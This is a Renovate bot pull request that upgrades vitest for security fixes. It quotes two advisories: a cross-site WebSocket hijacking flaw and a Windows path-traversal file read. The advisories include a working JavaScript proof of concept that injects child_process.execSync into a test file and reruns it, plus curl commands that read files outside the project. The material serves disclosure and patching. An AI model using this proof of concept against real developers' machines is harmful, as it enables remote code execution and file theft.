Skip to content

chore(deps): update dependency vitest to v3 [security]#25

Open
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-vitest-vulnerability
Open

chore(deps): update dependency vitest to v3 [security]#25
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-vitest-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Feb 4, 2025

Copy link
Copy Markdown
Contributor

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Confidence
vitest (source) ^1.3.1^3.0.0 age confidence

Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening

CVE-2025-24964 / GHSA-9crc-q9x8-hgqq

More information

Details

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC
  1. Open Vitest UI.
  2. Access a malicious web site with the script below.
  3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.
// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})
Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Severity

  • CVSS Score: 9.6 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


When Vitest UI server is listening, arbitrary file can be read and executed

CVE-2026-47429 / GHSA-5xrq-8626-4rwp

More information

Details

Summary

Arbitrary file can be read on Windows when Vitest UI server is listening, especially when exposed to the network.

Impact

Only users that match either of the following conditions are affected:

  • explicitly exposes the Vitest UI server to the network (using --api.host or api.host config option)
  • running the Vitest UI or Browser Mode on Windows
Details

The API handler for /__vitest_attachment__ uses the deprecated isFileServingAllowed incorrectly.
https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/ui/node/index.ts#L77
The function expects the passed value to use cleanUrl after the check before file system related operation.
Because of this, it is possible to bypass the check by \\?\\..\\. This is not possible on Linux as Linux errors if a directory named ? does not exist.

A similar problem exists in other places as well.

That said, this isFileServingAllowed check does not actually prevent the API to be abused. Since the API has rerun feature and file write feature, it's possible to run arbitrary script by writing a script as a test file using saveTestFile and running it using rerun. This means exposing the API / Vitest UI is equivalent to giving script execution access.
On the browser mode side, there're readFile / writeFile / saveSnapshotFile. So exposing the browser mode is equivalent to giving file read / write access.

PoC
  1. Run Vitest UI
  2. Get the API token by curl http://localhost:51204/__vitest__/
  3. Run curl "http://localhost:51204/__vitest_attachment__?path=C:\\path\\to\\project\\?\\..\\..\\secret.txt&amp;contentType=text/plain&amp;token=$TOKEN" (TOKEN is the API token)
  4. curl shows the content of secret.txt that is outside the project directory
Mitigations

Vitest now ships two configuration flags, allowWrite and allowExec, that gate the privileged operations exploited by this vulnerability. Both are disabled by default whenever the API server is bound to a non-localhost host, ensuring that exposing the server to the network no longer implicitly grants write or execute capabilities to remote clients.

When these flags are disabled, the UI also enters a read-only mode: in-browser code editing and test file execution are turned off, removing the attack surface that allowed remote code execution. Many Browser Mode features are also disabled, like attachments, artifacts or snapshots. See browser.api.

Users who require the full interactive UI on a networked host must explicitly opt in by setting allowWrite and/or allowExec to true.

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

vitest-dev/vitest (vitest)

v3.2.6

Compare Source

v3.2.5

Compare Source

v3.2.4

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v3.2.3

Compare Source

   🚀 Features
   🐞 Bug Fixes
    View changes on GitHub

v3.2.2

Compare Source

   🚀 Features
   🐞 Bug Fixes
    View changes on GitHub

v3.2.1

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v3.2.0

Compare Source

   🚀 Features
   🐞 Bug Fixes
    View changes on GitHub

v3.1.4

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v3.1.3

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v3.1.2

Compare Source

   🐞 Bug Fixes
   🏎 Performance
    View changes on GitHub

v3.1.1

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v3.1.0

Compare Source

🚀 Features
🐞 Bug Fixes
🏎 Performance
View changes on GitHub

v3.0.9

Compare Source

   🐞 Bug Fixes

Note

PR body was truncated to here.


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the dependencies label Feb 4, 2025
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 4c91bc6 to 55f964d Compare February 9, 2025 16:02
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 55f964d to 46f48eb Compare March 3, 2025 15:03
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 3 times, most recently from 7fbb36e to a43f4e1 Compare March 17, 2025 15:56
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from a43f4e1 to 1aea6d7 Compare April 1, 2025 09:10
@github-actions

github-actions Bot commented Apr 1, 2025

Copy link
Copy Markdown

Coverage Report

Status Category Percentage Covered / Total
🔵 Lines 0% 0 / 571
🔵 Statements 0% 0 / 571
🔵 Functions 0% 0 / 6
🔵 Branches 0% 0 / 6
File CoverageNo changed files found.
Generated in workflow #862 for commit ece8b35 by the Vitest Coverage Report Action

@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 1aea6d7 to b6e4e1b Compare April 8, 2025 16:26
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from b6e4e1b to b94eb64 Compare May 19, 2025 14:48
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from d150cd8 to 69ada20 Compare June 4, 2025 07:59
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 69ada20 to 09c5278 Compare June 22, 2025 10:53
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 09c5278 to 9edc928 Compare July 2, 2025 20:13
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from 50bae53 to 17b5724 Compare August 13, 2025 13:25
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 17b5724 to ab63779 Compare August 19, 2025 11:58
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from ab63779 to 73e54db Compare August 31, 2025 12:01
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 73e54db to b1ccf56 Compare September 25, 2025 17:56
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from b1ccf56 to 643261c Compare October 21, 2025 19:37
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 643261c to 692c614 Compare November 10, 2025 22:46
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 692c614 to d8a3d0c Compare November 18, 2025 13:47
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from d8a3d0c to 7454249 Compare December 3, 2025 16:44
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 7454249 to e16231d Compare December 31, 2025 18:45
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from e16231d to b691afb Compare January 8, 2026 21:08
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from e64d659 to 2c399f3 Compare January 23, 2026 20:53
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 2c399f3 to daaa17a Compare February 2, 2026 16:09
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from 454585f to ec06d3a Compare February 17, 2026 18:14
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from ec06d3a to 87f4a43 Compare March 5, 2026 16:34
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 87f4a43 to 0547393 Compare March 13, 2026 12:55
@renovate renovate Bot changed the title chore(deps): update dependency vitest to v1.6.1 [security] chore(deps): update dependency vitest to v1.6.1 [security] - autoclosed Mar 27, 2026
@renovate renovate Bot closed this Mar 27, 2026
@renovate renovate Bot deleted the renovate/npm-vitest-vulnerability branch March 27, 2026 02:47
@renovate renovate Bot changed the title chore(deps): update dependency vitest to v1.6.1 [security] - autoclosed chore(deps): update dependency vitest to v1.6.1 [security] Mar 30, 2026
@renovate renovate Bot reopened this Mar 30, 2026
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from 0547393 to 2adcbcc Compare March 30, 2026 19:12
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 2adcbcc to 13e3038 Compare April 8, 2026 16:06
@renovate renovate Bot changed the title chore(deps): update dependency vitest to v1.6.1 [security] chore(deps): update dependency vitest to v1.6.1 [security] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot changed the title chore(deps): update dependency vitest to v1.6.1 [security] - autoclosed chore(deps): update dependency vitest to v1.6.1 [security] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 3 times, most recently from e7c9587 to 7e4c986 Compare April 29, 2026 17:08
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from 385a099 to 1bba652 Compare May 18, 2026 13:29
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from ece8b35 to 732e770 Compare June 1, 2026 23:46
@renovate renovate Bot changed the title chore(deps): update dependency vitest to v1.6.1 [security] chore(deps): update dependency vitest to v4 [security] Jun 1, 2026
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 732e770 to 485ab6f Compare June 8, 2026 20:52
@renovate renovate Bot changed the title chore(deps): update dependency vitest to v4 [security] chore(deps): update dependency vitest to v3 [security] Jun 8, 2026
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 485ab6f to a24ecd9 Compare July 12, 2026 14:29
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants